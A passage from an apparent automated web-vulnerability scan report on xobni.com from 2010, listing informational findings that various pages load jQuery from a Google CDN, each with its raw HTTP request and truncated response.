User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:10:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7703

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.52. http://www.xobni.com/homepage/homeproducts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.53. http://www.xobni.com/homepage/homeproducts/subsfree_test

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/subsfree_test

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/subsfree_test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.54. http://www.xobni.com/homepage/homeproducts/subsplus_popup_test

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/subsplus_popup_test

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/subsplus_popup_test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.55. http://www.xobni.com/homepage/homeproducts/subsplus_test

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/subsplus_test

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/subsplus_test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.56. http://www.xobni.com/homepage/homeproducts/xobnifree

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/xobnifree

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/xobnifree HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=en
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.57. http://www.xobni.com/homepage/homeproducts/xobnimobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/xobnimobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/xobnimobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=en
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7814

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.58. http://www.xobni.com/homepage/homeproducts/xobniplus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/homeproducts/xobniplus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/homeproducts/xobniplus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=en
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:15 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.59. http://www.xobni.com/homepage/productmenu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/productmenu/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/productmenu/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:14:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7739

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.60. http://www.xobni.com/homepage/productmenu/free

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/productmenu/free

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/productmenu/free HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.61. http://www.xobni.com/homepage/productmenu/mobilebb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/productmenu/mobilebb

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/productmenu/mobilebb HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.62. http://www.xobni.com/homepage/productmenu/plus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/productmenu/plus

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/productmenu/plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7916

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.63. http://www.xobni.com/homepage/productmenu/xobnione

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /homepage/productmenu/xobnione

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /homepage/productmenu/xobnione HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.64. http://www.xobni.com/hoovers-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /hoovers-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hoovers-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Hoovers in Outloo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.65. http://www.xobni.com/huddle-outlook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /huddle-outlook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /huddle-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Huddle in Outlook
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.66. http://www.xobni.com/learnmore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14446

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>L'Outlook add-in
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.67. http://www.xobni.com/learnmore/compare.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/compare.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/compare.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10657

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Free vs. Xo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.68. http://www.xobni.com/learnmore/extension_step1.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/extension_step1.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/extension_step1.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/salesforce
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8711

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Using You
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.69. http://www.xobni.com/learnmore/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /learnmore/mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /learnmore/mobile HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15898

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni f..r BlackB
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

